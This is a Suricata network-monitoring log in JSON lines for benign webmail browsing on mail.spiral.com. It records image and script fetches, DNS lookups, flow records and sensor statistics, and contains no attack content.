{"timestamp":"2020-02-29T00:27:05.081787+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:27:05.082241+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.084761+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} 
{"timestamp":"2020-02-29T00:27:05.085232+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":8}} {"timestamp":"2020-02-29T00:27:05.086063+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:27:05.086632+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":9}} {"timestamp":"2020-02-29T00:27:05.087326+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:27:05.117258+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} 
{"timestamp":"2020-02-29T00:27:05.129323+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:05.129537+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} 
{"timestamp":"2020-02-29T00:27:09.000200+0000","event_type":"stats","stats":{"uptime":15281,"capture":{"kernel_packets":142477,"kernel_drops":0},"decoder":{"pkts":142501,"bytes":97889223,"invalid":196,"ipv4":140902,"ipv6":10,"ethernet":142501,"raw":0,"null":0,"sll":0,"tcp":135303,"udp":5388,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2925,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2941,"synack":2932,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1928,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2465,"failed_udp":116},"tx":{"http":5062,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2549}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":191168,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:09.589567+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53172,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:27:09.593077+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53174,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:27:10.080478+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":8}} {"timestamp":"2020-02-29T00:27:10.090833+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":16}} {"timestamp":"2020-02-29T00:27:10.090862+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":10}} 
{"timestamp":"2020-02-29T00:27:11.000463+0000","flow_id":2027510962510488,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:10.449176+0000","end":"2020-02-29T00:22:10.558947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:11.000760+0000","flow_id":643767004159899,"event_type":"flow","src_ip":"192.168.10.130","src_port":34304,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":61,"bytes_toserver":3771,"bytes_toclient":80639,"start":"2020-02-29T00:26:01.384923+0000","end":"2020-02-29T00:26:06.438507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:11.724590+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:27:11.749561+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36399,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:27:11.774787+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":0}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} 
{"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:16.000175+0000","event_type":"stats","stats":{"uptime":15288,"capture":{"kernel_packets":142521,"kernel_drops":0},"decoder":{"pkts":142534,"bytes":97894139,"invalid":196,"ipv4":140933,"ipv6":10,"ethernet":142534,"raw":0,"null":0,"sll":0,"tcp":135332,"udp":5390,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2926,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2942,"synack":2933,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1929,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2466,"failed_udp"
:116},"tx":{"http":5064,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2550}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10890,"memcap_state":0,"memcap_global":0},"http":{"memuse":40157,"memcap":0}}} {"timestamp":"2020-02-29T00:27:16.947002+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.456753+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} 
{"timestamp":"2020-02-29T00:27:19.458133+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:19.462861+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464307+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","state":"CLOSED","stored":false,"size":138,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464428+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:27:19.465999+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:27:19.465837+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.467776+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.479778+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} 
{"timestamp":"2020-02-29T00:27:19.480640+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:19.481302+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.481869+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} 
{"timestamp":"2020-02-29T00:27:19.489678+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41386,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:19.522783+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":2}} 